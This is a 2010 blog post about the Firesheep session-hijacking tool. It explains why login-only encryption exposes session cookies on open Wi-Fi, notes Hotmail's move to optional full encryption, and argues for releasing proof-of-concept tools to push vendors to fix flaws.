Late last month a freelance programmer, Eric Butler, released a proof of concept security tool at ToorCon that allows a user on a typical cafe wireless network (like the free and abundant Starbucks wireless networks) to easily gain illegitimate access to other users’ Web2.0 sessions. This includes applications such as Facebook, Twitter, Google, Hotmail, Flicker and many more. More directly this means that if you and I were sitting in the same Starbucks using the wireless network, and I were running Firesheep on my computer, once you logged in I would immediately have access to your account. All of this is can be downloaded and installed in less than five minutes, and is as easy as hitting “Go” to start accessing other wireless users’ accounts. For full details, check out earlier articles such as this one (Plugin, FireSheep, Lays Open Web 2.0 Insecurity) or visit the creator’s website directly (Firesheep – codebutler).

It is important to note that this was not some new vulnerability that was recently discovered, it’s a very well-known and industry accepted flaw. The fundamental flaw is that many “secure” personal applications only encrypt traffic to the login page, securing your username and password, then resume unencrypted traffic. Not only does this give “curious” users on the same unencrypted wireless network access to your potentially sensitive data accessed inside the application (email, name, address, contacts, etc.), but it also gives them access to your session ID, typically stored in a cookie that is sent across the unencrypted link with every page request. This session ID is how the website controls access to your account after you’ve given your username and password, and once compromised can be used to gain full access to your account. This has been well discussed at length many times before, but the industry line has been that the performance costs and requirements associated with encrypting all traffic to their applications make it cost prohibitive.

It appears that Firesheep has rocked the boat significantly, with more than 600,000 downloads, and making this particular type of attack “so easy a caveman could do it” with point and click simplicity. Microsoft has announced this week that Hotmail will allow full session encryption as an option for users. While it was mentioned in late September that this announcement would be made later this Fall, one can’t help but think it was hastened after the flurry of firesheep media coverage. It should also be noted to Hotmail users, that this is just an option, not by default as Gmail has done since early this year, so it will require the user to be aware and enable encryption manually which is unlikely for the majority of the general population.

For those in the information security industry, it’s no surprise that actions speak louder than words. For better or for worse, this is approach that many independent vulnerability researchers have taken for years, because the industry and the general public tend to ignore “bugs” unless a proof of concept exploit is created to prove the security impact. There will always be the tar pit of ethical dilemmas surrounding responsible disclosure of both the vulnerability and the PoC exploit, and opponents will claim that by releasing the code you are enable and encouraging people to use it for malicious purpose. I would argue that knowledge and tools have always been a double edged sword, but the alternative is concentration of knowledge and power by the few and powerful who make decisions for a general public left in the dark. This is the antithesis of a truly democratic society that relies on an informed public to apply the appropriate pressure to industry and political representatives in order to create socially beneficial progress.

Firesheep provides a mechanism for someone as technically challenged as my parents to visually recognize the threat this vulnerability poses to their information security and to become aware enough to ask the simple question, “Why don’t they fix this?” My hope is that this sentiment will quickly turn to, “They must fix this!” and large application developers will no longer be able to sweep gaping security holes under the rug due to the ignorance of the general public. It is discouraging to consider that we may never achieve a fully proactive security policy in the software industry, but as long as there are companies that drag their feet in implementing best practices there will be proof of concept tools to bring their vulnerabilities to light.

**All statements of fact or opinion on this website are the sole expressed views of the author and have no connection to the views of current or former employers**
This entry was posted on Thursday, November 11th, 2010 at 8:20 pm and is filed under Infosec Tools. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

0 Comments until now

Be the first commenter!

Comments are closed.